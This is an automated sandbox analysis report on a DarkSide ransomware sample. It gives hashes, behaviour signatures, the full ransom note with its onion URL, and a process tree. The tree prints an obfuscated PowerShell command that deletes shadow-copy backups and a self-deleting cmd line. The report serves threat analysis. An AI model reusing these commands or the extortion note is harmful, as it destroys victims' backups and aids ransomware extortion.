Overview

overview

10

Static

static

8

1667e16357...43.exe

windows7_x64

3

1667e16357...43.exe

windows10_x64

3

17139a10fd...61.exe

windows7_x64

10

17139a10fd...61.exe

windows10_x64

10

1cc7c198a8...cb.exe

windows7_x64

10

1cc7c198a8...cb.exe

windows10_x64

10

243dff06fc...60.exe

windows7_x64

10

243dff06fc...60.exe

windows10_x64

10

27214dcb04...8f.exe

windows7_x64

10

27214dcb04...8f.exe

windows10_x64

10

3dabd40d56...a6.exe

windows7_x64

3

3dabd40d56...a6.exe

windows10_x64

3

43e61519be...aa.exe

windows7_x64

10

43e61519be...aa.exe

windows10_x64

10

48a848bc9e...3a.exe

windows7_x64

10

48a848bc9e...3a.exe

windows10_x64

10

508dd6f7ed...dd.exe

windows7_x64

10

508dd6f7ed...dd.exe

windows10_x64

10

516664139b...4b.exe

windows7_x64

10

516664139b...4b.exe

windows10_x64

10

533672da9d...8d.exe

windows7_x64

10

533672da9d...8d.exe

windows10_x64

10

6228f75f52...ff.exe

windows7_x64

10

6228f75f52...ff.exe

windows10_x64

10

6836ec8588...d8.exe

windows7_x64

3

6836ec8588...d8.exe

windows10_x64

3

68872cc22f...e7.exe

windows7_x64

10

68872cc22f...e7.exe

windows10_x64

10

691515a485...a5.exe

windows7_x64

10

691515a485...a5.exe

windows10_x64

10

78782fd324...34.exe

windows7_x64

1

78782fd324...34.exe

windows10_x64

10

Resubmissions

27-01-2024 19:37

240127-yb5pksafd3 10

27-01-2024 19:36

240127-ybqwesafc2 10

12-05-2021 15:56

210512-db4t7vmwas 10

Analysis

  • max time kernel
    109s
  • max time network
    111s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    12-05-2021 15:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe

  • Size

    59KB

  • MD5

    6a7fdab1c7f6c5a5482749be5c4bf1a4

  • SHA1

    4e6d303d96621769b491777209c237b4061e3285

  • SHA256

    1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb

  • SHA512

    39446ebfae1dd0e007e81087f42021b95ee5a0a04e22ca7f4f5addbea4e71c7fe09ffd3bf953400955ce6d31b535c81a37b018aba73c30e61575b2c49414d6cd

Score
10/10
darksideransomwarespywarestealer

Malware Config

Extracted

Path

C:\\README.7b336f65.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT When you open our website, put the following data in the input form: Key: 0kZdK3HQhsAkUtvRl41QkOdpJvzcWnCrBjjgg5U4zfuWeTnZR5Ssjd3QLHpmbjxjo7uWzKbt8qPVuYN38TsDPI3bemd5I40ksemIzuI5OhIHZsi9cn3Wpd7OUT72FP9MyAUzR586yMsI2Ygri9in0Bf4EkG0pmBOLyRG1T788foGJQW1WxS1Qd2sMVvX0jKlbGG1zLp7g0u6buDCzSMyTjWjuVzJYufBBv7S2XvciEVvboiTNbZA4UUU6PttKERQSb018aILd6xO3ulk6fbEgZDO5tZSGn2zRevn5YXnHtg6vt1ToLe3izQOgYbs8Ja1fkfJBUYVux1ITyWBjpn0xPayKfwln8SqgMkbqiDyxEDEtFhqiffLcONMhi4TmW50loZIC6mWSaOjThWp6XSJUWPtY8Mkzs8Cs0qjPahx58iAEVIRGUVpLkMs7xPN7ydZ6wMWaOcRC1AD1JEUVTjLikXXyckgYaS6FnEv0UNEsv6QbTLSpDomIg3rEYZBib6ozrwH5n0M5wrKo8NciUBmfJWDP4XKkjznpsa05rEpuAklM0dMmZsYGVR !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

    ransomwaredarkside
  • Modifies extensions of user files 18 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Control Panel 1 IoCs
    evasion
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe
    "C:\Users\Admin\AppData\Local\Temp\1cc7c198a8a2c935fd6f07970479e544f5b35a8eb3173de0305ebdf76a0988cb.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\1CC7C1~1.EXE >> NUL
      2⤵
        PID:476
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4232

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/4128-120-0x000001A27CA50000-0x000001A27CA52000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4128-121-0x000001A27CA53000-0x000001A27CA55000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4128-122-0x000001A27CA00000-0x000001A27CA01000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4128-127-0x000001A27EBB0000-0x000001A27EBB1000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4128-136-0x000001A27CA56000-0x000001A27CA58000-memory.dmp

      Filesize

      8KB

      Download